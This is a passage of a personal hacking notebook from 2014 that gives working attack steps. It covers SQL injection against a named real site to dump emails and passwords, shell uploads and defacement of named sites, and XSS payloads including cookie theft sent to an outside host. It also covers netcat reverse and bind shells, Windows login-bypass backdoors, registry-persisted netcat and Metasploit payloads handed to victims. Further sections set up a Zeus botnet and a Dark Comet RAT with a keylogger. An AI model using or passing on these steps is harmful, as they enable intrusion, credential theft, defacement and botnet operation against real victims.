msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database()
limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
-----------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
------------------------------------------------------------------------
Respectively :~ For 2,3,4,5,6,7,8.....
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'
Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'

December 31,
2014
NOTES]
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,column_name) from information_schema.columns WHERE
table_name=0x64657461696c73 limit 0,1)))--+
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from
/*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit
0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
----------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively :~ For 2,3,4,5,6,7,8.....
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city
msg: Could not query:XPATH syntax error: ' :cust_address'
msg: Could not query:XPATH syntax error: ' :cust_phone'
=====================================================================
Note : I got
Table -> users
Columns -> Password & Email

December 31,
2014
NOTES]
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select
concat(email,0x3a,password) from users limit 0,1)))--+
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from
/*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'
=====================================================================
4. DNN Portal Hacking
1 : inurl:tabid/176/Default.aspx
2 : inurl:"/portals/0/" site:.com
3 : inurl:/tabid/36/language/en-US/Default.aspx
4 : inurl:/portals/0/default.aspx
5 : DNN(Link Gallary)
6 : inurl:/tabid/36/language/en-US/Default.aspx
7 : inurl:fcklinkgallery.aspx
step 1 : http://www.parallax.com/tabid/768/productid/92/default.aspx [ Find a website with
above vanulabilities ]
> Replace : /tabid/768/productid/92/default.aspx
> With : /Providers/Htmleditorproviders/fck/fcklinkgallery.aspx
step 2 : http://www.parallax.com/Providers/Htmleditorproviders/fck/fcklinkgallery.aspx
step 3 : click on File (A File On Your Site) and then replace the link with -->
javascript:__doPostBack('ctlURL$cmdUpload','')
step 4 : up will see the uploading button. Upload { shell , Deface it , put your signature}
step 5: http://www.parallax.com/portals/0/shadow.txt
5. Simlink Attack
1] Upload shell 404.php on your hacked website and root the webserver.
2] Upload contact.php & database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php

December 31,
2014
NOTES]
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php
3] go to [sec. info] in your shell then [readable : etc/passwd <view>]
4] copy all username & passwd from [ etc/passwd ]
5] paste in [ http://site.com/contact.php ] [ config fucker ] tab.
6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ]
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/
7] on configweb page [ you have some text that contain user & password ] [ these files are
reverse or linked website details ]
8] Now login to them using database.php [ change password in database ]
9] login to main site then and deface there index.php page.
6. XSS
1. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
2. <IMG SRC="javascript:alert('XSS');">
3. <IMG SRC=javascript:alert('XSS')>
4. <IMG SRC=JaVaScRiPt:alert('XSS')>
5. <IMG SRC=JaVaScRiPt:alert('XSS')>
6. <IMG SRC=javascript:alert("XSS")>
7. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
8. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
10. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
11. <IMG
SRC=javascript:al&#10
1;rt('XSS')>
12. <IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#
0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040
&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
13. <IMG SRC="javascript:alert('XSS');">
==========================================================================
Hands On Series – Cross Site Scripting (XSS) Part 1
In this episode we start dealing with Cross Site Scripting (XSS) attacks.

December 31,
2014
NOTES]
CSS = Cascading Style Sheets
XSS = Cross Site Scripting
Cross Site Scripting is a technique used to add script to a trusted site that will be executed on other users
browsers.
A key element to XSS is that one user can submit data to a website that will later be displayed for other
users.
It is nessesary that the bad guy NOT mess up the HTML structure, otherwise the result will be web
defacement rather then attacking other users.
The hackme site has been updated and improved (more about that in a moment)
and now includes a section for XSS which we will be using in this episode.
As usual, for the “Hands on Series” I recommend that you listen to these episodes while viewing the
hacking test site and
have the show notes visible and ready to cut and paste from.
If we look at the source for the page we will see this:
Lets start by trying to somehow add an attribute so that when someone mouses over the name, the
javascript will be executed.
----------------------------------------------------------------------------------------------------------------------------
Attack #1 – Against Email Address
=================================
Attack 1: Original
<a href=”mailto:john@somedomain.com“>John Doe</a>
Attack 1: Desired addition
onmouseover=”alert(„Hacked‟);”
Attack 1: Desired Result
<a href=”mailto:bob@bob.com” onmouseover=”alert(„Hacked‟);”>Bob Smith</a>
Attack 1: Attack String
bob@bob.com” onmouseover=”alert(„Hacked‟);

December 31,
2014
NOTES]
Attack 1: Actual Result
<a href=”mailto:bob@bob.com” onmouseover=”alert(„Hacked‟);”>Bob Smith</a>
Sucess! Mouse over the Name you entered and you see a popup that says “I hacked you”.
At this point we have proven that we can insert code onto the site and have it executed by a web
browser!
This attack is only executed based on a user event (the user mousing over the link)
Lets try creating a script tag, which will get executed while the page is loaded by the browser (so
basically right away).
-----------------------------------------------------------------------------------------------------------------------------
Attack #2 – Against Email Address
=================================
Attack 2: Original
<a href=”mailto:john@somedomain.com“>John Doe</a>
<script>alert(„Hacked‟);</script>
<a href=”mailto:bob@bob.com”><script>alert(„Hacked‟);</script><”>Bob Smith</a>
bob@bob.com”><script>alert(„Hacked‟);</script><”
<a href=”mailto:bob@bob.com”><script>alert(„Hacked‟);</script><”“>Bob
Smith</a>
Failure! No popup takes place.
Notice the Actual Result does not match the Desired Result.
This is because of htmlentities as mentioned in the helper notes.
-----------------------------------------------------------------------------------------------------------------------------
Attack #3 – Against Title
=========================

December 31,
2014
NOTES]
Attack 3: Original
<td>Works Great</td>
<script>alert(„Hacked‟);</script>
<td><script>alert(„Hacked‟);</script></td>
Works Great<script>alert(„Hacked‟);</script>
<td>Works Great<script>alert('Hacked');</script></td>
Failure! No popup takes place.
This almost worked, except that the single and double quotes get escaped, so lets try making something
that doesnt need quotes.
-----------------------------------------------------------------------------------------------------------------------------
=========================
In the alert function lets use the global variable document.domain in the attack string.
Works Great<script>alert(document.domain);</script>
<td>Works Great<script>alert(document.domain);</script></td>
Success! A popup should appear that says hackme.ntobjectives.com
Maybe this isnt convincing enough… lets try cookies.
-----------------------------------------------------------------------------------------------------------------------------
=========================

December 31,
2014
NOTES]
Works Great<script>alert(document.cookie);</script>
<td>Works Great<script>alert(document.cookie);</script></td>
Success! A popup should appear that shows all your cookie data.
Theres nothing stopping the hacker from having the user send this data to their server.
I have setup a page for displaying inputs sent to it, but it makes sure to escape characters to make sure
this isnt an attack point.
http://hackme.ntobjectives.com/xss/bin.php
Try it now
http://hackme.ntobjectives.com/xss/bin.php?abc=123
You should be shown that abc=123
This page will display anything you put in the GET params.
I want to push your cookie data over to my site, so that I can attempt a session take over.
-----------------------------------------------------------------------------------------------------------------------------
=========================
Attack 6: Original
<td>Works Great</td>
<script>window.location=‟http://hackme.ntobjectives.com/xss/bin.php?var=‟+document.cookie;</script
>
We have already established that I cannot insert those single quotes that I need around the URL, so we
need to enter into a little more advanced methods.
Using the javascript function String.fromCharCode allows me to get around needing quotes by turning
each decimal value into its character, and it doesnt require any quotes.

December 31,
2014
NOTES]
So we just convert our desired string into decimal first
This:
http://hackme.ntobjectives.com/xss/bin.php?var=
becomes:
104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,
99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61
and the attack string becomes
Works
Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101
, 46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,
105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script>
<td>Works
Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101
, 46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,
105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script></td>
Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing
you all the data from your cookies.
If this were an attackers site, it would just collect the info and pass you back to the page you came from,
and its unlikely you would have ever noticed that your session information had been stolen.

December 31,
2014
NOTES]
7. Shell Uploading & Defacement

December 31,
2014
NOTES]
8. PHP Disclosing [ site.com/a.php?id=index.php ] [ Disclose index.php ]

December 31,
2014
NOTES]
9. Manipulating Parameters
Step1 : open site and search for hidden elements...

December 31,
2014
NOTES]
Step2 : Change the hidden elements value using temper data or developer toolkit [
Firefox add-ons ]

December 31,
2014
NOTES]
10. Dictionary Attack

December 31,
2014
NOTES]
11. Heart bleed

December 31,
2014
NOTES]
12. DNS Zone Transfer

December 31,
2014
NOTES]
13. Brute Force Attack Against SCADA Systems

December 31,
2014
NOTES]
System Hacking
1. ADS [AlterNet Data Streaming]
Practical Guide to Alternative Data Streams in NTFS
step1 : type "tab.mp4" >C:hacktab.mp4:tab.mp4
go to location --> C:hack
type command :
i. dir -> it show all stuff in directory then conform that tab.mp4 has been made with 0kb
size.......then ,
ii. start vlc tab.mp4:tab.mp4
To deduct ads file use (Only recovery tools can find these files):
i. ADS Spy v1.11
ii. get my data back
2. System Password Hacking & Cracking
 ophCrack (Crack password)
 John The Ripper (Crack password)
 Cain & Able (Crack password)
 slax work (Crack password)
 hiren boot cd (Remove password)
 ERD commander (till win 7) [reset password & repair & recovery of windows form boot
sector virus] (Remove password)
 Saminside [windows tool] [U can dump any sam file to it for cracking] (Remove password)
 Kon-Boot (Login Page Bypassing)
3. Back Doors
1. Win-XP
> c:windows/system32
> copy CMD.EXE
> Change Name to " sethc.exe "
> Put back sethc.exe to " system32 " folder

December 31,
2014
NOTES]
2. Win-7
> c:windows/system32
> look for " ULTRAMAN.EXE " change its permission , ownership and name .
> copy cmd .exe to desktop and rename it to " ULTRAMAN.EXE " put back it in
system32 folder.
NOW :
> at login page press shift 5 times.
> cmd will pop up type command
> net user <username> /del , /add , * [ remove and reset password ]
3. NetCat : [ Netcat can simply be described as a tool that can read and write to
TCP and UDP ports. This dual functionality suggests that Netcat runs in two
modes:“client” and “server”. ]
I. Connect to TCP/UDP Ports
> localhost ~ # nc -h [ Help ]
> localhost ~ # nc -vv www.site.com 22 [ nc -vv <site> <port> ]
Bind Shell
> Victim / User1 :
> C:>nc -lvvp 4444 -e cmd.exe
> Attacker / User2 :
> BT ~ # nc -v 192.168.0.198 4444 [ User1 "cmd" comes to User2 ]
Reverse Shell
> User1 :
> C:>nc -lvvp 4444
> User2 :
> BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash [ Now, User2 is sending
his "shell" to User1 ]

December 31,
2014
NOTES]
Uploading Netcat After Hacking With Metasploit :
meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:WINDOWSSYSTEM32
meterpreter > reg enumkry -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun
meterpreter > reg setval -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun -v
NETCAT -d C:WINDOWSsystem32nc.exe" -L -d -p 1234 -e cmd.exe"
meterpreter > reg enumkey -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun
Note : Netcat can be installed in win xp,vista,7 [ Once netcat is installed
sucessfully on victim os no need to exploit use commands :]
root@bt:~# nc <victim ip> <port>
root@bt:~# nc 192.168.217.141 1234
4. Steganography
1. hiding text on image
> run
> cmd
> cd desktop
> copy /b image.jpg+password.txt final_image.jpg
2. OpenPuff
> Freeware, 256-bit multi-encryption, Carrier chains, Multi-layered obfuscation

December 31,
2014
NOTES]
5. Detect Steganography
Backtrack Forensics: Steganoghraphy
Menu: Forensics -> Forensic Analysis Tools
Directory: /usr/local/bin/
 stegbreak
 stegcompare
 stegdeimage
 stegdetect
stegdecect is a tool to detect steganography in image files, it supports different methods, which
used to hide content. Currently, the detectable schemes are: jsteg, jphide (unix and windows),
invisible secrets, outguess 01.3b, F5 (header analysis), appendX and camouflage. Stegbreak is
used to launch dictionary attacks against JSteg-Shell, JPHide and OutGuess 0.13b.
Before we start to use the tools we need an image, which has some hidden content. Let's review a
few hiding apps before using stegdetect. As I didn't found any preinstalled in BT, so I installed
steghide for first, which can hide content in jpeg, bmp, wav, au files.
Using steghide:
apt-get install steghide - installation
steghide --info IMG_4422.JPG - get info from the image (how much data can be hidden)
steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass -Z - hide
mysecret.txt with password "mypass", and create a new file, where the file is hidden, and don't
compress data
steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass - same as the
previous but w/ compression
steghide --extract -xf mysecret2.txt -sf steg2.jpg -p mypass - extract the file
The bad news is that stegdetect won't detect steghide algorithm. Despite the fact, I tried it to ses
what happens.

December 31,
2014
NOTES]
Using stegdetect:
stegdetect -t [list of tests] steg.jpg - where tests can be (by default jopifa enabled):
j - Tests if information has been embedded with jsteg.
o - Tests if information has been embedded with outguess.
p - Tests if information has been embedded with jphide.
i - Tests if information has been hidden with invisible secrets.
f - Tests if information has been hidden with F5.
F - Tests if information has been hidden with F5 using a more sophisticated but fairly slow
detection algorithm.
a - Tests if information has been added at the end of file, for example by camouflage or
appendX.
stegdetect -s[number] steg.jpg - setting sensitivity
Actually setgdetect found jphide for the original and the created image as well, so it's clearly
false positive.
I tried to see what stegbreak can do, and created a list of password where I put only one line, the
correct password.
stegbreak -f passlist.txt steg.jpg
I got the following error: "stegbreak: fopen: /usr/local/share/stegbreak/rules.ini: No such file or
directory"
I downloaded the source and placed the ini file in the said location, but you can also download it
from here.
After that I got a "Segmentation fault" error. I couldn't find a working solution for this problem,
however it's a known bug.
Second I tried outguess, which can hide info in jpeg files.

December 31,
2014
NOTES]
Using Outguess :
apt-get install outguess
outguess -k "mypass" -d index.html IMG_4422.JPG out2.jpg - hides index.html in
IMG_4422.JPG
Unfortunately stegdetect doesn't detect the hidden file (probably because I used outguess v2),
even if increasing the sensitivity, as you can see:
My last try was with jphide, I used the windows version, as had no luck with installing the one
for Linux. It can be downloaded from here.
As you can see stegdetect can detect it, when increasing sensitivity, but as it claims the same
thing for the original image, so...
stegcompare can compare the original and the image which stores information, but I couldn't
figure out what the output means.
tegdeimage - not sure about what it should do, also gives the following error:
"/home/stego_analysis/compress/dscf0033.jpg : error: No such file or directory"
looking at the source code:
73 if (jpg_open("/home/stego_analysis/compress/dscf0033.jpg") == -1)
74 return;
it is clear that it will never run, unless you have such an image.
Overall I'm not really convinced by the stegdetect toolset, it's buggy, and doesn't really find
steganography correctly.
Official website for steghide: http://steghide.sourceforge.net/
Official website for stegdetect and outguess: http://www.outguess.org/
Official website for jphide: http://linux01.gwdg.de/~alatham/stego.html

December 31,
2014
NOTES]
Stegdetect :

December 31,
2014
NOTES]
Steghide :
stegcompare :

December 31,
2014
NOTES]
outguess :
6. Bypassing Login Page Windows With Backtrack
 Make a bootable backtrack pendrive
 Boot the system and open backtrack
 Open Terminal
 mkdir /root/Desktop/p7771 [ Create any folder ]
 fdisk -l
 mount /dev/sda2 /root/Desktop/p7771 [ Mount Your windows C-Drive ]
 ls -la /root/Desktop/p7771/
 cd /pentest/password/chntpw
 ./chntpw -i Desktop/p7771/Windows/System32/config/sam
 Press - 1 [ Edit User Data And Password ]
 Press - 1 [ Clear Blank User Password ]
 Press - q [ Quit ]
 Press - y [ Write hive file ? ]

December 31,
2014
NOTES]
Malwares
1. Botnet
I ] How To Find Cpanel :
A] we need a compromised website with Symlink attack eg :
link:www.site.com/akismet/configweb [ it has all password files ]
1] python cracker.py http://www.pjmi.net/wp-content/plugins/akismet/configweb/
'/root/Desktop/ab' [ copy all password to ab folder from compromised Symlink website ]
2] upload cpanal.php to your shell.
3] copy all password to your cpanal.php
4] run command on your previous shell "eg: wso.php" for user name ---> ls /var/mail
5] copy all user to your cpanel.php
6] click on start it will show you list of active cpanel
7] find website from reverse ip lookup
8] default port for cpanel :2082 [ www.site.com:2082 ]
II ] Configuring Zeus Botnet :
A ] Creating IRC Server :
1] open c-panel
2] go into public folder
3] create folder [ Eg : XXX ]
4] upload your IRC scripts [Zeus.rar in your cpanal to make your cpanal an IRC
Server ]
5] extract the Zeus.rar to server.
6] open www.site.com/XXX/install/index.php
NOW : Now we will setup a database and link it with our IRC server.
B ] Creating Database :
7] go into cpanel & click into my sql database wizard
8] crate a new database and user
Eg : Yahoo >> Next
Eg : User Name = yahoo
Eg : Password = Click on " Generate Password " [ Copy/Rembember [ User Name & Password ]

December 31,
2014
NOTES]
9] Click on create user.
10] Go to = www.site.com/XXX/install/index.php
> give password that has been generated.
11] Come back to your database page and assign/give permision or click on all
privilidge.
12] Copy username & database name and go to -->
www.site.com/XXX/install/index.php [ Under Mysql Server ]
> give the user name.
> give the database name.
13] Click on next step [ Database will be created and linked with IRC server ]
14] Now for login in botnet panel we have to give : password [ Eg:abc123 ]in -->
www.site.com/XXX/install/index.php [ Under Root User ] [ By default user will be "admin" ]
15] Now create encryption key Eg : 123123 [ Under Options : ]
16] Before Pressing " install " [ In www.site.com/XXX/install/index.php ] go
back to your folder " XXX " [ Where you have uploaded your IRC ]
> Right click on --> system [ Folder ]
> Change Permission to --> 777 [Read-Write-Exicute]
17] Go back to control panel [ www.site.com/XXX/install/index.php ] Press "
Install "
18] Now go to --> www.site.com/XXX/cp.php
> Username = admin
> Password = abc123
C ] Configuring Bot :
19] Open & Extract "client.rar" .
20] Run "gzero.exe"
21] Click On Builder > click on " edit ".
> configuration file of bot will be opened.
> replace all links with your server path -- > www.site.com/XXX/
> Eg. http://www.rumahbaut.com/xxx/cfg.bin ----->
http://www.site.com/xxx/cfg.bin
> Eg. http://www.rumahbaut.com/xxx/tr.exe ------>
http://www.site.com/xxx/tr.exe
> Eg. http://www.rumahbaut.com/xxx/gate.php --->
http://www.site.com/xxx/gate.php
> Eg. http://www.rumahbaut.com/xxx/cfg1.bin ----->
http://www.site.com/xxx/cfg1.bin
> Eg. Encryption key = 1221421412 ------> Your encryption key [ 12312]
22] Click on " BUILD THE BOT CONFIGURATION " name Eg. BOT
Then ,

December 31,
2014
NOTES]
23] Click on " BUILD THE BOT EXECUTABLE " name Eg. tr.exe
D] Uploading The Bot :
24] Go to your IRC server folder where u uploaded & Extracted your zeus.rar file
[ www.site.com/ ]
25] Upload Both file that u have created "BOT" & "tr.exe"
NOTE : If doesn't UPLOAD : Try to compress and upload OR UPLOAD Both bot from your
shell. [wso.php]

December 31,
2014
NOTES]
2. Virus
 Virus Creator
 Sonic Bat
 TeraBit
 Infection Virus Maker
 Deadline Virus Maker
 JPS Virus Maker
 Jkymmel Batch Virus Creator
 WolfDEM's
 Virus Matic
 Necro Virus Maker

December 31,
2014
NOTES]
3. Trojans [ Top Ten RAT ( Remote Administrative Tools ) ]
 Dark Comet [ Setting Up Dark Comet RAT ]
1. Run client.exe
> allow connection
> Edit Server
> main setting
> connection setting
> Ip: Get local IP < Your IP>
> port : <any>
> Server Setup
> melt server
> Server Shield
> Anti Virtual Box
> Icon Setting
> Generate Server
> active keylogger
> create server
> click on connection.
> port listining mode
2. Give app to victim
3. Control Its PC

December 31,
2014
NOTES]
 Black Shades
 JSpy
 Pussy RAT

December 31,
2014
NOTES]
 Bozok RAT
 Poison lvy Rat
 Nj Rat

December 31,
2014
NOTES]
 DameWare RAT
 jRAT

December 31,
2014
NOTES]
 Cyber Gate
4. Worms
A worm is similar to a virus by design and is considered to be a sub-class of a virus. Worms
spread from computer to computer, but unlike a virus, it has the capability to travel without any
human action. A worm takes advantage of file or information transport features on your system,
which is what allows it to travel unaided.
The biggest danger with a worm is its capability to replicate itself on your system, so rather than
your computer sending out a single worm, it could send out hundreds or thousands of copies of
itself, creating a huge devastating effect. One example would be for a worm to send a copy of
itself to everyone listed in your e-mail address book. Then, the worm replicates and sends itself
out to everyone listed in each of the receiver's address book, and the manifest continues on down
the line.
Due to the copying nature of a worm and its capability to travel across networks the end result in
most cases is that the worm consumes too much system memory (or network bandwidth),
causing Web servers, network servers and individual computers to stop responding. In recent
worm attacks such as the much-talked-about Blaster Worm, the worm has been designed to
tunnel into your system and allow malicious users to control your computer remotely.

December 31,
2014
NOTES]
Penetration testing
Types Of Testing :
1. White-Box Testing
2. Black-Box Testing
3. Grey-Box Testing
4. Internal Testing
5. External Testing
Process Of Pen-testing :
1. Information gathering
2. Scanning & Banner Grabbing
3. Vulnerability Scanning
4. Exploitation ( Obtaining Access )
5. Maintaining Access & Erasing Evidence
Tools :
1. Metasploit
2. Core-impact
METASPLOIT
Vulnerability : A weakness that allows an attacker to compromise the secrity of
system.
Exploits : Doing the step by step procedure of gathering information
Payload : the process to gain access which is blocked by user
Encoders : The process to remove tracks.

December 31,
2014
NOTES]
Need for Metasploit
1. difficult to manage, update, customize dozen of exploits available on internet for
different technologies
2. customization of exploits will be time consuming & one also need high skills do
to same
METASPLOIT
 Testing framework for Penetration testing contains 1300+exploit
 http://cve.mitre.org
 rapid7.com
 www.exploit-db.com

December 31,
2014
NOTES]
I. Windows XP
To open Metasploit in kali Linux or backtrack use command : msfconsole
RCE ( Netapi ) ( Remote Code Execution ) [Win XP SP-2,3 -> vulnerable OS]
 msfconsole
 search netapi
 use exploit/windows/smb/ms08_067_netapi [ CVE NO = 067 ]
 show options
 set RHOST [TARGET IP] -> 192.168.1.20
 set PAYLOAD windows/meterpreter/bind_tcp
OR
 set PAYLOAD windows/meterpreter/reverse_tcp [ Test other payload also ]
 set LHOST 192.168.1.150 [Attacker Ip Address]
 set LHOST [MY IP ADDRESS]
 exploit
So we got successful meterpreter session It means u remotely login to xp-os.
now use help command for listing meterpreter commands.
Meterpreter Commands
meterpreter > getuid
meterpreter > ps
meterpreter > migrate 1444 [ migrate to that process which have admin privileges. ]
meterpreter > idletime
meterpreter > hashdump
meterpreter > screenshot
meterpreter > shell
> c:> net user root *
>c:> exit

December 31,
2014
NOTES]
Uploading Netcat :
meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:WINDOWSSYSTEM32
meterpreter > reg enumkry -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun
meterpreter > reg setval -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun -v
NETCAT -d C:WINDOWSsystem32nc.exe" -L -d -p 1234 -e cmd.exe"
meterpreter > reg enumkey -k HKLMsoftwareMicrosoftWindowsCurrentVersionRun
Note : Netcat can be installed in win xp,vista,7 [ Once netcat is installed successfully on victim
os no need to exploit use commands :]
root@bt:~# nc <victim ip> <port>
root@bt:~# nc 192.168.217.141 1234
More Commands :
meterpreter > cat <file name>
meterpreter > download C:<file name>
meterpreter > upload C:<file name>
meterpreter > searrch -d C: *d
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
meterpreter > uictl disable keybord
meterpreter > uictl enable keybord
meterpreter > run [ press tab show many more commands ]
meterpreter > run vnc
Creating Backdoor :
meterpreter > run metsvc [Maximum Virus And Trojens Work On 31337 Port]
meterpreter > background [ to go back ]

December 31,
2014
NOTES]
NOTE : What if our connection break or victim patch his vulnerability to connect with our
"Backdoor" :-
use exploit/multi/handler
set payload/windows/metsvc_bind_tcp
show options
set rhost < victim >
set lport 31337 ---------> because our backdoor is working on 31337 port.
exploit
meterpreter > run
meterpreter >

December 31,
2014
NOTES]
II. Windows Server 2003
Windows Server Hacking [ 2003 SP - 1,2 ]
RCE ( Netapi ) ( Remote Code Execution ) [ windows server 2003 SP-1,2,platinum ]
 msfconsole
 exploit/windows/smb/ms06_040_netapi
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST [MY IP ADDRESS]
 set RHOST [TARGET IP]
 exploit
III. Windows 7
Windows 7 Hacking
(dot)EXE [ Trojan ] [ Hack Any Windows Os ]
root@#~/ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444
x > /root/12345.exe
NOTE : Give 12345.exe [ virus ] to victim
 use exploit/multi/handler
 show options
 set lhost < Our Ip >
 set lport 4444 ---------> because our virus is working on 4444 port
 exploit
 meterpreter > run

December 31,
2014
NOTES]
IV. Browser Exploits
Autopwn [ combo of may exploits ] [See also : Java bean jmx17_jmxbean ]
 use auxiliary/server/browser_autopwn
 show options
 set LHOST <My Ip >
 set SRVHOST < My Server is hosted on my computer so again my ip >
 set SRVPORT 80
 set URIPATH /
 exploit

December 31,
2014
NOTES]
V. ARORA Exploit
msf>use exploit/windows/browser/ms10_002_aurora
msf>show options
msf>set URLPATH/
http://192.168.42.131/
msf>show payloads
msf>set payload windows/vncinject/reverse_tcp
msf>show options
msf>set lhost 192.168.17.128
msf>exploit
VI. Windows 8
Attacker
1. start terminal :
2. root@bt:~# msfpayload windows/meterpreter/reverse_tcp Lhost=192.168.17.128
LPORT=4444 x > /root/12345.exe
Now give this 12345.exe <- Virus to victim Then Run,
root@bt:~# msfconsole
msf>
msf> use exploit/multi/handler
msf> exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf> exploit(handler) > show options
msf> exploit(handler) > set LHOST 192.168.17.128
msf> exploit(handler) > set LPORT 4444
msf> exploit(handler) > exploit

December 31,
2014
NOTES]
VII. DLL Injection
1. Hack Windows 7 with Metasploit using Kali Linux.
Machine 1: Host Kali Linux Machine
Machine 2: Target Windows 7 Machine
msfconsole
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf > set payload windows/meterpreter/reverse_tcp
msf > show options
msf > set SRVHOST 192.168.31.20
msf > set LHOST 192.168.31.20
msf > exploit
msf > sessions
msf > sessions -i 1
meterpreter >

December 31,
2014
NOTES]
Buffer Overflow
#include<stdio.h>
void main()
{
char *name;
char *command;
name=(char *)malloc(10);
command=(char *)malloc(128);
printf("address of name is : %dn",name);
printf("address of command is : %dn",command);
printf("Difference between address is : %dn",command-name);
printf("Enter your name");
gets(name);
printf("Hello %sn",name);
system(command);
}
root@kali:~#
root@kali:~# gcc buffer.c -o buffer
root@kali:~# ./buffer
Eg: Output : 347582347y5823458723453425534523453452345234cat /etc/passwd
1] Buffer Over Flow Attack On orbital_viewer
 msfconsole
 search bof
 search orbital
 use exploit/windows/fileformat/orbital_viewer_orb
 show options
 set LHOST <Our IP>
 exploit
 exit
Note : Give " msf.orb " to victim now,
 show options

December 31,
2014
NOTES]
 exploit
II. Buffer Overflow In VLC Player
 use exploit/windows/fileformat/vlc_modplug_s3m
 show options
 set LHOST <Our IP>
 exploit
 exit
Note : Give " msf.s3m " to victim now,
 show options
 exploit

December 31,
2014
NOTES]
Wi-Fi Hacking
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
1. WEP / WPA / WPA-2
WEP - Wired Equivalent Privacy
 WEP keys are a sequence of hexadecimal digits.
 These digits include the numbers 0-9 and the letters A-F.
 Some examples of WEP keys are:
 1A648C9FE2
 99D767BAC38EA23B0C0176D152
 The length of a WEP key depends on the type of WEP security (called "encryption")
utilized:
 40- or 64-bit WEP: 10 digit key
 104- or 128-bit WEP: 26 digit key
 256-bit WEP: 58 digit key
 WPA-PSK - Wi-Fi Protected Access (Pre-Shared Key) security key
 The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-
bit keys used in the WEP system.
 Temporal Key Integrity Protocol - TKIP
 TKIP employs a per-packet key system that was radically more secure than fixed
key used in the WEP system.
 KIP was later superseded by Advanced Encryption Standard (AES).
 WPA2 - Wi-Fi Protected Access II
 256-bit encryption
 using a security key of either 64 hexadecimal digits or a passphrase of up to 63
ASCII characters.
2. Command Line
 airmon-ng -> To Put Your Network adapter in monitor mode.
 airodump -ng -> Start monitoring and packets sniffing.
 aireplay -ng -> For Deauthanticate the user.
 aircrack -ng -> To crack the key.

December 31,
2014
NOTES]
SSID - service set identifier (Name of Network)
BSSID - Base Station service set identifier -> BSSIDs Identify Access Points and Their Clients
(AP MAC Address)
